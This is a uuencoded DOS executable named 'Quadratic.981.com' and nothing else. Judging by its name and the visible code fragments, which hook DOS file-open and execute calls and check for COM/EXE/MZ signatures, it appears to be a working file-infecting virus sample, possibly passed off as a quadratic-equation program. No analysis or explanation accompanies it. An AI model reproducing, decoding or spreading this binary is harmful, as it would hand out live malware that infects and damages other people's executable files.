begin 755 Quadratic.981.com
MZP&0Z```78'M!@$>!K0_N___S2$]__]U`^F!`#/`4!^AA`"+'H8`+HF&,0(N
MB9XS`J$D`(L>)@`NB8;E`2Z)GN<!C,!(CMB`/@``6G5/@RX#`%'&!@``6J$2
M`"U1`*,2`([80([`Q@8``%K&!@$`",8&`P!0#A^_``&-M@`!N=@#\Z0SP([8
M^L<&A`#]`8P&A@#'!B0`U`&,!B8`^P<?@?PQ(W4AC,`%$``N`8;``2X#AL(!
M^BZ+IL0!CM#[Z@``````````C;:\!+\``5>Y&@#SI,-04U%2'N1@/%-T"A]:
M65M8Z@````"T*LTA@/H.=>T.'[0)NJ$$S2'KXH#\/W0[@/P1="Z`_!)T*5!3
M45)75AX&@/Q+="L]`&QT*X#\/70H@/P^=!`''UY?6EE;6.H`````Z?8!Z*L!
MZ^N#^_]U[I//Z`D`Z]^+UNCQ`.O8Z#(")HM%#8O0@^(?@_H?=0/IN0`NH]8$
M#1\`)HE%#0X?M#^Y&@"ZV03-(5<&#@>^V02_O`2Y&@#SI`=?Z`D"@3[9!$U:
M=`W&!MD$Z2T#`*/:!.M9BS;M!(DVO@&+-N\$B3;``8LVZ02)-L0!BS;G!(DV
MP@&+-N$$L033YE!2*\:#V@"Y$`#W\8D6[02C[P2CYP3'!ND$,2-:6`78`X/2
M`+D``O?Q0(D6VP2CW02T0+G5`[H#`<TA)L=%%0``)L=%%P``M$"Y&@"ZV03-
M(;@!5R:+30TFBU4/S2&`/M@$`70(M#Z<#NCX_L/&!M@$`,.+\KD``4:`/"YT
M`^+XPX!\`4-T$X!\`6-T#8!\`45T!X!\`65T`<.!?`)/3706@7P";VUT#X%\
M`EA%=`B!?`)X970!P^C_`":+50V#XA^#^A]UB^@#`8O*B]!14H/J'(/9`+@`
M0LTAM#^Y'``.'[K9!,TA)L=%%0``)L=%%P``M$"ZV02Y&@#-(5I9@>K5`X/9
M`+@`0LTAM$`SR<TAH?,$)HE%#>DW_X/[!7)"Z(4`B_>#QB@F@3Q#3W0))H$\
M15AT`NLJ)H!\`DUT"2:`?`)%=`+K&B;'10("`";'114``";'11<``,8&V`0!
MZ2;^PYP.Z/W]/`!U.U!3!K11S2&.PR8['A8`=2B+VHH'4+0OS2%8//]U`X/#
M!R:+1Q<E'P`]'P!U"R:!;QW5`R:#7Q\`!UM8SU.T$K`@S2\FBAVT$K`6S2];
MP[@`/9P.Z*/]D^CB_R;'10("`,.X`D(SR9G-(<,*#5%U861R871I8R!%<75A
M=&EO;@H-)%-$.3/-(```````````````````````````````````````````
7````````````````````````````````
`
end
